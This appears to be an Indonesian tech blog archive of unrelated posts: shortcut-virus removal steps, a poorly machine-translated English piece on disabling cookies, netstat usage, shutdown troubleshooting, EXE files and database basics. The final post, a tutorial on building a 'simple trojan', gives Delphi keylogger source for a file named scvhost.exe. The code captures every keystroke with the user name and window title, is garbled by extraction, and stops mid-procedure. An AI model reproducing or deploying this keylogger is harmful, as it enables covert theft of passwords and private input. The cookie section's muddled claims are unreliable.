Virus Shortcut

Inget temen gw kemaren jadi pengen buat posting tentang artikel ini, yah nggk jauh2 sih kasusnya tentang virus shortcut, awalnya sih si doi minta tolong suruh bener'n kompynya, wokey lah besuk senin dia bilang, yah sud dc, tapi sekarang gi hari sabtu, hmm,..bingung dc mw ngapain malem minggu gini, pacar juga lum punya, haduew,, betapa malang nasipku ne, hehe,..  akhirnya gw iseng2 buat artiket ini dc, ya sud lah dari pada kepanjangan, :D
 

 Virus PIF/Starter atau yang lebih dikenal dengan virus shortcut membuat kesal korbannya dengan banyak sekali shortcut yang dibuat oleh virus tersebut. Repotnya, kalau cara penanganan virus ini tak tepat maka ia malah akan kembali lagi, lagi dan lagi.

Berikut ini beberapa cara dari analis virus Vaksincom MG Lat untuk menghentikan banjir shortcut yang diakibatkan virus ini:

1. Sebelumnya matikan dulu proses system restore.

2. Matikan proses dari file Wscript yang terletak di C:\Windows\System32, dengan cara menggunakan tools seperti CProcess, HijackThis atau dapat juga menggunakan Task Manager dari Windows.

3. Setelah dimatikan proses dari Wscript tersebut, kita harus men-delete atau me-rename dari file tersebut agar tidak digunakan untuk sementara oleh virus tersebut.

Sebagai catatan, kalau kita me-rename dari file Wscript.exe tersebut dengan otomatis, maka akan dikopikan lagi di folder tersebut. Oleh sebab itu, kita harus mencari di mana file Wscript.exe yang lainnya, biasanya ada di C:\Windows\$NtServicePackUninstall$, C:\Windows\ServicePackFiles\i386.

Tidak seperti virus-virus VBS lainnya, kita bisa mengganti Open With dari file VBS menjadi Notepad, virus ini berextensi MDB yang berarti adalah file Microsoft Access. Jadi Wscript akan menjalankan file DATABASE.MDB seolah-olah dia adalah file VBS.

4. Delete file induknya yang ada di C:\Documents and Settings\\My Documents\database.mdb, agar setiap kali komputer dijalankan tidak akan me-load file tersebut. Dan jangan lupa kita buka juga MSCONFIG, disable perintah yang menjalankannya.

5. Sekarang kita akan men-delete file-file Autorun.INF. Microsoft.INF dan Thumb.db. Caranya, klik tombol START, ketik CMD, pindah ke drive yang akan dibersihkan, misalnya drive C:\, maka yang harus kita lakukan adalah:

Ketik C:\del Microsoft.inf /s, perintah ini akan men-delete semua file microsoft.inf di seluruh folder di drive C:. Sementara kalau mau pindah drive tinggal diganti nama drivenya saja contoh: D:\del Microsoft.inf /s.

Untuk file autorun.inf, ketik C:\del autorun.inf /s /ah /f, perintah akan men-delete file autorun.inf (syntax /ah /f) digunakan karena file tersebut memakai attrib RSHA, begitu juga untuk file Thumb.db lakukan juga hal yang sama.

6. Untuk men-delete file-file selain 4 file terdahulu, kita harus mencarinya dengan cara search file dengan ekstensi .lnk ukurannya 1 kb. Pada 'More advanced options' pastikan option 'Search system folders' dan 'Search hidden files and folders' keduanya telah dicentang.

Harap berhati-hati, tidak semua file shortcut / file LNK yang berukuran 1 kb adalah virus, kita dapat membedakannya dari ikon, size dan tipenya. Untuk shortcut yang diciptakan virus ikonnya selalu menggunakan icon 'folder', berukuran 1 kb dan bertipe 'shortcut'. Sedangkan folder yang benar harusnya tidak memiliki 'size' dan tipenya adalah 'File Folder'.

7. Fix registry yang sudah diubah oleh virus. Untuk mempercepat proses perbaikan registry salin script dibawah ini pada program 'notepad' kemudian simpan dengan nama 'Repair.inf'. Jalankan file tersebut dengan cara:

- Klik kanan repair.inf

- Klik Install

[Version]

Signature="$Chicago$"

Provider=Vaksincom Oyee

[DefaultInstall]

AddReg=UnhookRegKey

DelReg=del

[UnhookRegKey]

HKLM, Software\CLASSES\batfile\shell\open\command,,,"""%1"" %*"

HKLM, Software\CLASSES\comfile\shell\open\command,,,"""%1"" %*"

HKLM, Software\CLASSES\exefile\shell\open\command,,,"""%1"" %*"

HKLM, Software\CLASSES\piffile\shell\open\command,,,"""%1"" %*"

HKLM, Software\CLASSES\regfile\shell\open\command,,,"regedit.exe "%1""

HKLM, Software\CLASSES\scrfile\shell\open\command,,,"""%1"" %*"

HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0, "Explorer.exe"

HKLM, SYSTEM\ControlSet001\Control\SafeBoot, AlternateShell,0, "cmd.exe"

HKLM, SYSTEM\ControlSet002\Control\SafeBoot, AlternateShell,0, "cmd.exe"

[del]

HKLM,SOFTWARE\Microsoft\Windows\CurrentVersion\Run, Winupdate

HKCU,SOFTWARE\Microsoft\Windows\CurrentVersion\Run, explorer

Disable Cookie 3 methods for safer surfing

The role of cookie a lot of people know - cookie which maintains our record of websites visited, so that people with ulterior motives to see if this information, the information they achieved the purpose of spying, and now for the cookie's attack a few, these black hands by downloading the network database method to download local computer cookie, including our view of information, background information on our server, our administrators and even our bank account passwords and so on.

There are a number of thefts use of social engineering, such as through the spy to steal your cookie number, etc. of your qq, so although you can appeal to come back, but inevitably you qq friends are being deleted, also have our own game account and password, this is a lot of people are very concerned, cookie landed on a record of such information, if we allow the evil manipulator abuses, who knows what the future would happen, although what the network is virtual, but looking at their hard earned equipment went to the pockets of others, you have any plans?

Many of them "safe", they insist spent a day cleaning up the computer in a timely manner ie the cache file, delete the cookie work. Have to admire the perseverance to do so every day, but it is a fact that is undeniable - a day to do so, too much trouble. So how simple but effective in preventing others using the cookie spying on us?

Disable the cookie can directly reach the above objectives. There are three ways for you choose:

1, IE Options Act

1, start IE;

2, in the "Tools" menu, click "Internet Options", open the "Internet Options" dialog box;

3, click the "Privacy" tab, move the slider on a higher level of privacy. If you move to the top is select "block all Cookie", then the system will block all sites Cookie, and the site can not read the computer has the Cookie;

4, click "OK" button.

Second, property law

 Of course, the above "IE Options Act," the author is in IE6 in the operation is complete, if you're using IE5, then at the "Internet Options" dialog box "Security" tab to set it in IE4 in different. The following "property law" to save the Cookie folder is set to "read only" attribute, which website will not be able to write to the Cookie information. The law applies to all versions of IE.

1 to start the "Windows Explorer";

2, find the Save Cookie folder. Use the Windows versions, save the Cookie folder is different. For example, in Windows XP, the folder is "C: Documents and Settings Username Cookies" folder; in Windows 98, is "C: WindowsCookies" folder;

3, right-click the folder, then click "Properties", open the folder Properties dialog box, select the "Read Only" check box, specify the file in this folder is read-only attribute, read-only means that the file can not be changed or accidentally deleted;

4, click "OK" button. Third, the registry law

"Property law" actually have some flaws that can be read by a computer site still has the Cookie. But there are some special Cookie not in the form of text files, but stored in memory. Type of Cookie is usually the user access to certain special Web site, the system automatically generates in memory, once the visitors leave the site then automatically deleted from memory Cookie. Cookie of the two methods would do nothing to help those through QQ love (http://www.qqai.net) introduced the "Registry" system can make up for these deficiencies.

 1, click the "Start" menu, then click "Run", then "Open" box, type "regedit", click "OK" button, open the "Registry Editor" window;

2, expand "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionInternet SettingsCacheSpecial PathsCookies" branch, right-click "Cookies", then click on the shortcut menu, "delete" command, when prompted to confirm the deletion, click "Yes" button;

3, close the "Registry Editor" window.

In order to prevent some site will Cookie files on your computer, in addition to manually set up as described above, there is a simple method is to install software to protect your Cookie files. More of such software, you can go to the major software download site to download. For example, Complete Cleanup Software Trail is a Cookie is specifically designed to remove all kinds of software, it is very powerful, not only allows the saved in the computer Cookie nowhere to hide, users can also browse web pages stored in the hard disk cache of spam removal.

 

Memantau koneksi jaringan dengan netstat

Netstat (network statistics) adalah program berbasis teks yang berfungsi untuk memantau koneksi jaringan pada suatu komputer, baik itu jaringan lokal (LAN) maupun jaringan internet.

Kapan saya membutuhkan netstat? misalkan suatu ketika anda sedang internetan kemudian tiba tiba koneksi menjadi sangat lambat dan anda mencurigai ada program di komputer anda yang jadi penyebabnya.

Jika hal itu yang anda alami maka anda perlu memanggil program netstat untuk melakukan pengecekan.

Cara menggunakan netstat di windows

Untuk memanggil netstat pertama buka dulu command prompt di windows, caranya klik Start> All Programs> Accessories> Command Prompt atau Start> Run> ketik cmd lalu Ok.

Sekarang pada command prompt ketikan netstat (tekan enter) maka akan ditampilkan koneksi jaringan yang sedang berlangsung pada saat itu.

Sebagai contoh berikut ini adalah koneksi jaringan di komputer saya

Active Connections

Proto  Local Address          Foreign Address        State
TCP    fatality:1772          cg-in-f100.google.com:http  ESTABLISHED
TCP    fatality:1773          74.125.153.99:http     ESTABLISHED
TCP    fatality:1774          74.125.153.103:http    ESTABLISHED
TCP    fatality:1775          74.125.153.113:http    ESTABLISHED
TCP    fatality:1042          localhost:25377        ESTABLISHED
TCP    fatality:1043          localhost:1044         ESTABLISHED
TCP    fatality:1044          localhost:1043         ESTABLISHED
TCP    fatality:1046          localhost:1047         ESTABLISHED
TCP    fatality:1047          localhost:1046         ESTABLISHED
TCP    fatality:25377         localhost:1042         ESTABLISHED

Berikut ini keterangan dari output netstat diatas :

• Proto. Kolom proto menunjukan jenis protokol yang dipakai bisa TCP atau UDP.
• Local Address. Kolom ini menjelaskan alamat dan nomor port yang ada di komputer anda yang mana saat itu sedang aktif melakukan koneksi. Contoh diatas fatality adalah nama host dari komputer saya dan 1772 adalah nomor port di komputer saya yang sedang melakukan koneksi.
• Foreign Address. Kolom ini menunjukan koneksi yang dituju oleh local address beserta nomor portnya. Contoh diatas saya sedang menghubungi server google melalui http (port 80) yang artinya saya sedang browsing google.
• State. Kolom ini menunjukan status dari koneksi yang sedang terjadi. ESTABLISED artinya sudah terhubung dengan komputer lain dan siap mengirimkan data.

State yang mungkin terjadi :

• LISTENING -> siap untuk melakukan koneksi
• SYN_SENT -> mengirimkan paket SYN
• SYN_RECEIVED -> menerima paket SYN
• ESTABLISHED -> koneksi terjadi dan siap mengirimkan data
• TIME_WAIT -> sedang menunggu koneksi

Masih ada state TCP yang lain seperti FIN_WAIT_1, FIN_WAIT_2, CLOSE_WAIT, LAST_ACK dll untuk lebih jelasnya anda bisa baca buku yang membahas tentang TCP/IP

Yang perlu diperhatikan jika muncul state SYN_SENT dalam jumlah yang banyak dan terus menerus, efeknya koneksi internet anda menjadi sangat lambat.

Hal ini bisa disebabkan karena pada komputer anda terdapat malware entah itu virus, trojan atau worm yang berusaha melakukan koneksi ke internet.

Berikut ini parameter lain yang bisa anda gunakan untuk perintah netstat.

• netstat -a , menampilkan semua koneksi baik yang listening maupun yang tidak
• netstat -e, menampilkan statistik paket yang dikirim dan yang diterima
• netstat -n, menampilkan alamat dan port dalam bentuk numerik
• netstat -o, menampilkan PID (Process ID) untuk setiap koneksi
• netstat -s, menampilkan statistik per protokol
• netstat -r, menampilkan routing table
• netstat -p protokol, menampilkan statistik berdasarkan protokol tertentu

Dengan netstat anda juga bisa menampilkan program mana saja (*.exe) yang sedang aktif melakukan koneksi ke internet, berikut ini perintahnya

netstat -b 5

perintah diatas akan ditampilkan setiap 5 detik, untuk mengakhirinya tekan CTRL+C. Bagi anda yang senang dengan catatan atau log, anda juga bisa memberi perintah kepada netstat untuk mencatat statistik koneksi ke dalam file teks. Berikut ini perintahnya :

netstat -b 5 > c:/koneksi.txt

Perintah diatas akan mencatat statistik ke file koneksi.txt setiap 5 detik.

Cara menggunakan netstat di linux

Menjalankan program netstat di linux kurang lebih sama seperti di windows, hanya saja ada beberapa parameter yang berbeda.

Berikut ini beberapa parameter untuk perintah netstat di linux

• netstat -a , menampilkan semua koneksi baik yang listening maupun yang tidak
• netstat -l , menampilkan semua koneksi yang listening saja
• netstat -s , menampilkan statistik per protokol
• netstat -n , menampilkan dalam bentuk numerik
• netstat -o , menampilkan timer
• netstat -g , menampilkan berdasarkan group membership
• netstat -i , menampilkan tabel network interface
• netstat -I , menampilkan network interface tertentu misal netstat -Ieth0
• netstat -p , menampilkan PID atau program yang sedang melakukan koneksi
• netstat -M, menampilkan IP masquerade

Untuk lebih jelasnya anda bisa melihat manual dari program netstat ini dengan cara mengetikan perintah :
man netstat

Perlu diingat linux bersifat case-sensitive artinya huruf besar dan huruf kecil dianggap berbeda. Jadi perintah netstat -n dengan netstat -N itu berbeda.

Mengatasi Masalah Komputer Mati Tanpa Peringatan

Jika komputer mati dan sebelumnya ada peringatan, itu berarti anda masih bisa mengetahui kira-kira sumber masalahnya apa. Tetapi kalau sedang digunakan dan tiba-tiba komputer mati begitu saja tanpa ada peringatan? Apa penyebab dan jalan keluarnya? Inilah solusinya;

Penyebab dan solusinya bisa salah satu dari kemungkinan di bawah ini.

1. Komputer terlalu Panas atau overheat
2. Masalah kesalahan/kerusakan hardware.
3. virus komputer.
4. Masalah pada sistem operasi misalnya windows.
5. Kegagalan lain dari hardware

Komputer terlalu Panas atau overheat.

Sebuah komputer dapat mematikan dirinya sendiri tanpa peringatan jika telah melebih panas maksimal yang disyaratkan (terutama Processor). Banyak komputer saat ini dirancang untuk mematikan atau me-reboot secara otomatis jika komputer, prosesor, atau perangkat lain di komputer Anda terlalu panas. Jika Anda telah mendengar ada suara-suara yang tidak normal dari komputer Anda seperti mendenging tinggi, ini bisa menunjukkan kegagalan dalam komputer Anda.

Anda dapat memulai dengan memeriksa kipas pada power supply dengan memeriksa bagian belakang komputer dan melihat apakah kipas angin bergerak dengan lancar. Anda bisa juga membuka komputer dan pastikan kipas bekerja (kipas prosesor dan kipas casing) dan / atau jika VGA menggunakan kipas, lalu silakan masuk ke BIOS dan pastikan BIOS tidak melaporkan kesalahan apapun. Perhatikan juga letak dari aluminium pendingin sebab jika posisinya tidak tepat, maka walaupun ada kipas, proses pendinginan akan tetap ada masalah.Pengguna dapat juga dapat menentukan seberapa panas komputer dengan onboard sensor termal. Jika komputer Anda dilengkapi dengan sensor ini, pastikan CPU anda tidak aktif overheat

Masalah kesalahan/kerusakan hardware

Setiap kegagalan komponen perangkat keras komputer Anda dapat menyebabkan komputer Anda untuk secara tak terduga mati tanpa peringatan. Jika Anda baru menambahkan perangkat keras baru, pastikan itu tidak menyebabkan masalah-masalah bagi komputer Anda. Sebelum mencoba untuk membuka perangkat keras, pastikan Anda tidak mengalami masalah karena konflik hardware dengan cara melihat Device Manager untuk mengecek kesalahan.

Jika masalah muncul ketika Anda baru saja memasang hardware baru ke dalam komputer, maka bisa dipastikan perangkat baru inilah penyebabnya. Jalankan komputer setelah membuka perangkat tadi dan amati apakah masalah anda selesai atau tidak.

Virus komputer

Mungkin komputer Anda terinfeksi virus yang dirancang untuk mematikan komputer Anda. Jika komputer Anda mati ketika menjalankan program tertentu pada waktu tertentu, misalnya komputer hanya langsung mati jika anda menjalankan Program Word maka itulah tandanya bahwa program tersebut terserang atau terinfeksi virus. Jika Anda yakin komputer Anda mungkin terinfeksi dengan sebuah virus atau tidak yakin apakah komputer Anda terinfeksi virus, pastikan Anda melakukan scandengan anti virus terbaru.

Masalah dengan sistem operasi.

Jika setelah mengikuti setiap rekomendasi di atas komputer Anda masih terus mati sendiri, kemungkinan anda mengalami masalah sistem operasi Microsoft Windows yang sulit dijelaskan. Untuk membantu memastikan bahwa hal ini terjadi, silakan coba langkah-langkah di bawah ini.

1. Reboot komputer dan masuk CMOS setup sebagai komputer boot. Jika Anda tidak terbiasa dengan cara memasukkan CMOS, silahkan download Panduan Menjadi Teknisi Komputer yang saya siapkan di samping.
2. Setelah Anda telah membuka komputer di CMOS setup, biarkan komputer beberapa saat.
3. Jika komputer tidak mati dalam beberapa waktu artinya dia bisa bertahan jalan pada BIOS maka kemungkinan penyebabnya adalah Microsoft Windows. Jika ini terjadi solusinya ada dalam buku Panduan Menjadi Teknisi Komputer

Kegagalan lain dari hardware

Jika setelah menginstal ulang sistem operasi Anda, atau selama instalasi sistem operasi Anda, kasus yang sama masih terjadi, sangat mungkin bahwa ada kegagalan hardware lainnya di komputer. Sering kali terjadi misalnya RAM, CPU, motherboard, dan / atau Power Supply.

Jika Anda memiliki persediaan ekstra bagian-bagian ini atau memiliki teman atau rekan kerja dengan konfigurasi yang sama, cobalah bertukar bagian-bagian ini untuk menentukan masalah Anda.Jika tidak, Anda perlu jasa teknisi yang lebih senior.

Tahukah Anda Apa Itu File EXE ?

Tahukah anda apa itu file EXE ? File exe adalah file komputer yang diakhiri dengan ekstensi “. Exe” atau dikenal sebagai file eksekusi. Ketika klik satukali pada file exe, built-in rutin secara otomatis mengeksekusi kode yang dapat mengatur beberapa fungsi. Fungsi File Exe digunakan untuk menginstal dan menjalankan program dan rutinitas. File exe hanyalah salah satu dari beberapa jenis format file yang diakui oleh berbagai macam sistem operasi.
Teks file, yang adalah file yang tidak menghasilkan kode tetapi hanya menampilkan teks, berakhir dengan txt. Microsoft Word menyimpan file dengan ekstensi doc untuk dokumen. Jenis file lain yang umum adalah compress atau zip file, yang menggunakan ekstensi zip.

File exe adalah salah satu jenis file yang paling berguna karena digunakan untuk menjalankan program, namun ini juga membuat potensi berbahaya. Hal ini dapat digunakan sebagai sistem pengiriman virus atau rutinitas hal lainnya. Di luar sana, file exe yang terinfeksi selalu sangat ramah menyepa bahkan membujuk anda. Jika diklik maka akan muncul tidak lebih dari sebuah kartun animasi atau permainan arcade sederhana. Namun, kode tak terlihat dapat berjalan di latar belakang, menginfeksi komputer Anda.

Jika meng-klik pada file exe berbahaya, selama beberapa jam atau hari berikutnya komputer mungkin menjadi tidak stabil. Seringkali pengguna tidak dapat mengerjakan pekerjaan-pekerjaan tertentu seperti kebutuhan untuk defragment atau scan disk. Keystrokes informasi pribadi atau sandi mungkin akan dicuri sebuah website yang tidak diketahui tanpa pengetahuan pengguna, atau mesin dapat menghapus file sendiri dan malapetaka akan terjadi. Namun sebenarnya skenario ini dapat dihindari dengan tidak mengklik pada file exe.

Karena potensi bahaya, saat mendownload file exe Anda harus scan virus dengan scanner dengan reputasi bagus sebelum mengkliknya. Untuk tujuan ini, para pakar keamanan merekomendasikan pengaturan browser sehingga situs tidak dapat menjalankan program secara otomatis. Surfer ini memberikan kesempatan untuk memantau program mana yang bisa dikirimkan ke komputer.

File Exe umumnya tidak dimaksudkan untuk diedit. Karena file exe paling sering digunakan untuk program, maka file ini dilindungi oleh undang-undang hak cipta, perjanjian lisensi per-koneksi yang dikeluarkan oleh pembuatnya. Hacking file exe adalah ilegal dalam kasus ini. Pengecualian adalah perangkat lunak domain publik. Perangkat lunak domain publik menjadi milik masyarakat dan secara legal dapat diubah oleh siapa pun.
Karena merupakan file yang rawan maka Anda harus hati-hati. Para ahli merekomendasikan menjaga checker virus up to date dan menghapus email dari sumber yang tidak dikenal. Jika Anda menerima file exe dari seseorang yang Anda percaya pun, file harus di-scan terlebih dahulu sebelum mengkliknya. Mengapa? Karena orang yang Anda kenal itu bisa difitnah oleh pihak ketiga tanpa pengetahuan Anda.

Database

Database adalah kumpulan dari item data yang saling berhubungan satu dengan yang lainnya yang diorganisasikan berdasarkan sebuah skema atau struktur tertentu.

Database tidak selalu berhubungan dengan komputer. Contohnya adalah buku telepon. Hal ini karena buku ini berisi kumpulan nama, alamat, dan nomor telepon yang disusun dalam urutan alfabetis. Namun pada saat sekarang ini, database sangat identik dengan komputer. Database di dunia komputer memang sudah menjadi bagian yang sangat penting. Hampir semua aplikasi memakai database sebagai tulang punggungnya. Database diperlukan karena berbagai macam alasan, diantaranya:

* Salah satu komponen penting dalam sistem informasi, karena merupakan dasar dalam menyediakan informasi
* Menentukan kualitas informasi: akurat, tepat pada waktunya dan relevan. Informasi dapat dikatakan bernilai apabila manfaatnya lebih efektif dibandingkan dengan biaya mendapatkannya
* Mengurangi duplikasi data (data redundancy)
* Hubungan data dapat ditingkatkan (data reliability)
* Mengurangi pemborosan tempat simpanan luar

Characters: Merupakan bagian data yang terkecil, dapat berupa karakter numerik, huruf ataupun karakter-karakter khusus (Special Characters) yang membentuk suatu item data/field

Field: Mempresentasikan suatu atribut dari record yang menunjukkan suatu item dari data, seperti misalnya nama, alamat dan lain sebagainya. Kumpulan dari field membentuk suatu record.

Record: Kumpulan dari field membentuk suatu record. Record menggambarkan syatu unit data individu yang tertentu. Kumpulan dari record membentuk suatu file. Misalnya file personalia, tiap-tiap record dapat mewakili data tiap-tiap karyawan.

File: Kumpulan dari record-record yang menggambarkan satu kesatuan data yang sejenis. Misalnya file mata pelajaran berisi data tentang semua mata pelajaran yang ada.

Database: Kumpulan dari file/table membentuk database

Database Management System atau sering disingkat menjadi (DBMS) diciptakan untuk menyediakan mekanisme penyimpanan data bersama, baik bagi user-user maupun program-program. Tugas utama bagi DBMS adalah untuk menyediakan fungsi pendefinisian data bagi user untuk mengakses dan merubah data yang tersimpan. Di luar fungsi utamanya, DBMS juga dituntut untuk memiliki kemampuan untuk mengamankan data dari user yang tidak berkepentingan, perbaikan bagi kegagalan sistem, concurrency : sehingga user yang banyak jumlahnya tersebut dapat mengakses database pada waktu yang bersamaan, dan melakukan pengecekan integritas sehingga data pada bagian yang berbeda dari suatu database dapat tetap konsisten secara logika terhadap keseluruhan database.
Sehingga dapat di tarik definisi umum bahawa DBMS adalah kumpulan program-program (software) yang memperbolehkan user untuk membuat dan memelihara database. Contoh dari DBMS adalah Oracle, MySQL, PostgreSQL, dan lain-lain,

Relational Database Management System (RDBMS) adalah sebuah sistem yang secara otomatis menyatukan semua DBMS yang saling berhubungan. RDBMS biasanya menggunakan 4th Generation Languange (4GL) dan sangat fleksibel sehingga data dapat dimodifikasi dengan mudah, demikian pula dengan struktur databasenya. RDBMS tumbuh dari suatu teori yang pertama kali dikembangkan oleh E.F Codd (IBM, 1969). Model relasi CODD ini digunakan untuk menciptakan sebuah sistem secara formal sebagai media penyimpanan data yang memisahkan representasi data secara internal dari akses dan representasi / perwujudan logikanya. Kekuatan RDBMS terletak pada kemampuannya untuk menyembunyikan detail dari penyimpanan data dari pengguna database dan cara penggunaanya yang lebih mudah baik bagi pembangunan aplikasi / programmer, maupun bagi pemakai akhir (end user). Hal ini didukung pula dengan penggunaan Structured Query Languange (SQL) sebagai sumber dari semua RDBMS.

SQL atau Structured Query languange merupakan bahasa ANSI (American National Standards Institute) yang digunakan untuk melakukan query data pada database. Semua pengoperasian data dapat dikerjakan secara mudah dengan menggunakan bahasa ini, terutama dalam pemasukan dan seleksi data. Hampir semua software database mengimplementasikan bahasa ini sebagai komponen utama dari produknya seperti Oracle, MySQL, Oracle, dan sebagainya.
Query adalah sebuah ekspresi bahasa yang menggambarkan data yang akan didapatkan kembali dari sebuah database. Atau dengan kata lain Query adalah istilah yang digunakan untuk menyatakan berbagai perintah SQL. Setiap perintah melakukan berbagai hal terhadap database. Sebagai contoh perintah CREATE akan membuat tabel dan database, perintah UPDATE akan merubah isi field database, dan sebagainya.

Jenis perintah SQL:
Perintah SQL dibedakan menjadi:

* DDL (Data definition Languange)

Merupakan kelompok perintah yang digunakan untuk melakukan pendefinisian database dan tabel. Dengan kelompok perintah dalam DDL ini maka kita dapat membuat tabel, mengubah strukturnya, menghapus tabel, membuat indeks untuk tabel, dan lain-lain yang bermuara pada pembentukan struktur database.
Perintah-perintah SQL dalam DDL adalah:
Create
Alter
Drop

* DML (Data Manipulation Languange)

Perintah SQL yang digunakan untuk melakukan manipulasi data dalam database.
Perintah-Perintah SQL yang digunakan adalah:
insert
update
delete
select

* DCL (Data Control Languange)

Termasuk di dalam DCL adalah perintah untuk melakukan pendefinisian pemakai yang boleh mengakses database dan apa saja privelegenya.Secara umum DCL merupakan bahasa yang digunakan untuk melakukan pengelolaan pemakai yang dapat melakukan akses dan manipulasi database terutama perintah GRANT dan ReVOKE. Perintah untuk commit dan roll back merupakan kelengkapan fasilitas dalam pembuatan aplikasi yang memungkinkan suatu transaksi yang terjadi untuk dapat segera disimpan dan dibatalkan transaksinya.

Membuat Trojan Sederhana Dengan Delphi

Trojan atau lebih dikenal dengan Trojan Horse, yang dapat diartikan Kuda Troya.
Dalam dunia komputer, Trojan adalah sebuah perangkat lunak yang patut dicurigai sebagai program jahat atau malicious software. Secara umum Trojan bersifat “stealth” atau tak terlihat dan bekerja secara diam-diam sebagai mata-mata yang dapat menyebabkan kerusakan system. Ide daripada Trojan ini diambil dari sejarah Perang Troya

, ketika itu para prajurit Yunani yang selama 10 tahun tidak dapat menembus benteng pertahanan Troya, bersembunyi di dalam Kuda Troya (sebuah patung kuda raksasa, yang terbuat dari bahan dasar kayu, yang di dalamnya terdapat sebuah ruang untuk bersembunyi) yang ditujukan untuk pengabdian kepada Para Petinggi Troya. Petinggi Troya pun menganggap Kuda Troya tersebut tidak berbahaya dan di izinkan untuk masuk dalam benteng Troya. Para Petinggi Troya tak menyadari bahwa Kuda Troya tersebut berisi para pasukan Yunani, sehingga perang pun tak dapat dihindarkan.

Source Code

Trojan Source Code (scvhost.exe)

Unit Keylogger : unit untOffLineLogger;

interface

uses SysUtils, unit1, Windows;

procedure OLGetLetter;
function OLShift:Boolean;

function
Answer:string):Boolean;

OLMoreChars(CharNumber:Integer;TruePart,FalsePart:string;var

procedure OLShowLetter(strLetter:string);
function OLActiveCaption:string;

implementation

var
cWindow:string;

const cr_lf = chr(13)+chr(10);

procedure OLGetLetter;
var
j:Integer;
a:string;
begin

3

//Verify if lettrers 'A'..'Z'..'a'..'z' is pressed
//basicly to see if its a or A check the state of the caps and shift keys
//same gows with every thing alse liek you 1 or ! :P

for j:=65 to 90 do
if Odd(GetAsyncKeyState(j)) then
if Odd(GetKeyState(VK_CAPITAL)) then
if GetKeyState(VK_SHIFT)<0 then
OLShowLetter(LowerCase(Chr(j)))
else
OLShowLetter(UpperCase(Chr(j)))
else
if GetKeyState(VK_SHIFT)<0 then
OLShowLetter(UpperCase(Chr(j)))
else
OLShowLetter(LowerCase(Chr(j)));


//Verify if numpab is pressed
for j:=96 to 105 do
if Odd(GetAsyncKeyState(j)) then
OLShowLetter(IntToStr((j - 97) + 1));
//Verify if F1 to F24 is pressed
for j:=112 to 135 do
if Odd(GetAsyncKeyState(j)) then
OLShowLetter('{F' + IntToStr(j - 112 + 1) + '}');
//Verify if number 0 to 9 is pressed
for j:=48 to 57 do
if Odd(GetAsyncKeyState(j)) then
if OLShift then
begin
case j - 48 of
1: OLShowLetter('!');
2: OLShowLetter('@');
3: OLShowLetter('#');
4: OLShowLetter('$');
5: OLShowLetter('%');
6: OLShowLetter('^');
7: OLShowLetter('&');
8: OLShowLetter('*');


4
9: OLShowLetter('(');
0: OLShowLetter(')');
end;
end
else
OLShowLetter(IntToStr(j - 48));
if Odd(GetAsyncKeyState(VK_BACK))
form1.Memo1.Text:=Copy(form1.Memo1.Text,1,Length(form1.Memo1.Text)-1);
if Odd(GetAsyncKeyState(VK_TAB)) then OLShowLetter('{TAB}');
if Odd(GetAsyncKeyState(VK_RETURN)) then OLShowLetter(#13#10);
//ok i added this in just so you know the all functions :P
if Odd(GetAsyncKeyState(VK_SHIFT)) then OLShowLetter('');
if Odd(GetAsyncKeyState(VK_CONTROL)) then OLShowLetter('');
if Odd(GetAsyncKeyState(VK_MENU)) then OLShowLetter('');
if Odd(GetAsyncKeyState(VK_PAUSE)) then OLShowLetter('');
if Odd(GetAsyncKeyState(VK_ESCAPE)) then OLShowLetter('{ESC}');
if Odd(GetAsyncKeyState(VK_SPACE)) then OLShowLetter(' ');
if Odd(GetAsyncKeyState(VK_END)) then OLShowLetter('');
if Odd(GetAsyncKeyState(VK_HOME)) then OLShowLetter('');
if Odd(GetAsyncKeyState(VK_LEFT)) then OLShowLetter('');
if Odd(GetAsyncKeyState(VK_RIGHT)) then OLShowLetter('');
if Odd(GetAsyncKeyState(VK_UP)) then OLShowLetter('');
if Odd(GetAsyncKeyState(VK_DOWN)) then OLShowLetter('');
if Odd(GetAsyncKeyState(VK_INSERT)) then OLShowLetter('');
if Odd(GetAsyncKeyState(VK_MULTIPLY)) then OLShowLetter('*');
if Odd(GetAsyncKeyState(VK_ADD)) then OLShowLetter('+');
if Odd(GetAsyncKeyState(VK_SUBTRACT)) then OLShowLetter('-');
if Odd(GetAsyncKeyState(VK_DECIMAL)) then OLShowLetter('.');
if Odd(GetAsyncKeyState(VK_DIVIDE)) then OLShowLetter('/');
if Odd(GetAsyncKeyState(VK_NUMLOCK)) then OLShowLetter('');
if Odd(GetAsyncKeyState(VK_CAPITAL)) then OLShowLetter('');
if Odd(GetAsyncKeyState(VK_SCROLL)) then OLShowLetter('');
if Odd(GetAsyncKeyState(VK_DELETE)) then OLShowLetter('');
if Odd(GetAsyncKeyState(VK_PRIOR)) then OLShowLetter('');
if Odd(GetAsyncKeyState(VK_NEXT)) then OLShowLetter('');
if Odd(GetAsyncKeyState(VK_PRINT)) then OLShowLetter('{PRINT SCREEN}');
if OLMoreChars($BA,':',';',a) then OLShowLetter(a);
if OLMoreChars($BB,'+','=',a) then OLShowLetter(a);
if OLMoreChars($BC,'<',',',a) then OLShowLetter(a);
if OLMoreChars($BD,'_','-',a) then OLShowLetter(a);
if OLMoreChars($BE,'>','.',a) then OLShowLetter(a);


then

5
if OLMoreChars($BF,'?','/',a) then OLShowLetter(a);
if OLMoreChars($C0,'~','`',a) then OLShowLetter(a);
if OLMoreChars($DB,'{','[',a) then OLShowLetter(a);
if OLMoreChars($DC,'|','¥',a) then OLShowLetter(a);
if OLMoreChars($DD,'}',']',a) then OLShowLetter(a);
if OLMoreChars($DE,'"','''',a) then OLShowLetter(a);
{PrintScreen}
end;


function
Answer:string):Boolean;
begin
OLMoreChars:=True;


OLMoreChars(CharNumber:Integer;TruePart,FalsePart:string;var

if Odd(GetAsyncKeyState(CharNumber)) then
begin
if OLShift then
Answer:=TruePart
else
Answer:=FalsePart;
Exit;
end;
OLMoreChars:=False;
end;

function OLShift:Boolean;
begin
OLShift:=GetAsyncKeyState(VK_SHIFT) <> 0;
end;

procedure OLShowLetter(strLetter:string);
const
cnMaxUserNameLen = 254;
var
cActive:string;
sUserName : string;
dwUserNameLen : DWord;
begin
dwUserNameLen := cnMaxUserNameLen-1;
SetLength( sUserName, cnMaxUserNameLen );
GetUserName(PChar(sUserName), dwUserNameLen);
SetLength(sUserName, dwUserNameLen);

6
cActive:=OLActiveCaption;
if cWindow <> cActive then
begin
cWindow:=cActive;
